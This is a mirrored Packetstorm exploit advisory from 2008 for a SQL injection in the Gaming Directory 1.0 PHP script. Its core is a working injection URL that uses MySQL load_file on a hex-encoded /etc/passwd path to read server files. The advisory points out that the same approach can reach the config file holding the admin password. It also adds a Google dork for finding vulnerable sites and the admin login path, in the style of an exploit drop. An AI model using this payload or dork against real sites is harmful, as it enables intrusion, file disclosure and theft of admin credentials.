Lucene search
K

gamingdir-sql.txt

🗓️ 08 Apr 2008 00:00:00Reported by t0pp8uzzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Gaming Directory 1.0 SQL Injection Vulnerability, allows remote attacker to pull info from the database and access admin login

Code
`--==+================================================================================+==--  
--==+ Gaming Directory 1.0 SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
  
Discovered By: t0pP8uZz  
Discovered On: 5 April 2008  
SITE: http://www.turnkeyzone.com/  
Google Dork: inurl:"directory.php?ax=list" gaming  
  
  
DESCRIPTION:   
this popular gaming directory script is vulnerable due to insecure mysql querys.  
this allows the remote attacker to pull info from the database.  
  
The below Injection uses MYSQL's load_file function, since the admin area password is stored  
in a config file we can use load_file to to try and locate it and display the contents of the file.   
certain permissons to the running db user is required for this to work. in the load_file below  
is a string that has been converted to HEX and if you can read hex then its /etc/passwd so this  
should load the /etc/passwd file on most linux distros. Remember certain permissions are needed.  
  
  
EXPLOITS:  
http://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*  
  
  
NOTE/TIP:   
admin login is at /siteadmin/  
  
  
GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew!  
  
  
  
--==+================================================================================+==--  
--==+ Gaming Directory 1.0 SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation